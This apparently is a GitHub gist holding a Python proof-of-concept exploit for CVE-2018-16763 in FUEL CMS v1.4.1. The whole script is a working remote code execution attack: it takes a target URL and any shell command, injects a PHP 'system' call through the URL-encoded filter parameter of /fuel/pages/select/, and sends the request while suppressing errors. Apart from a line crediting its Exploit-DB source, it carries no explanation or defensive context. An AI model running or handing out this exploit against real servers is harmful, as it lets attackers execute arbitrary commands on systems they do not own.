FUEL CMS v1.4.1 CVE-2018-16763 PoC
""" | |
FUEL CMS v1.4.1 CVE-2018-16763 PoC. | |
This PoC was derived from: https://www.exploit-db.com/exploits/47138. | |
""" | |
import argparse | |
import urllib | |
import requests | |
parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC') | |
parser.add_argument('url', type=str, help='URL to target, e.g. http://127.0.0.1') | |
parser.add_argument('cmd', type=str, help='Command to execute') | |
args = parser.parse_args() | |
url=args.url | |
cmd=args.cmd | |
payload="'+pi(print($a='system'))+$a('"+cmd+"')+'" | |
payload_enc=urllib.quote(payload) # URL encoded payload | |
filter_path='/fuel/pages/select/?filter='+payload_enc | |
try: | |
_ = requests.get(url+filter_path) | |
except: | |
pass |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment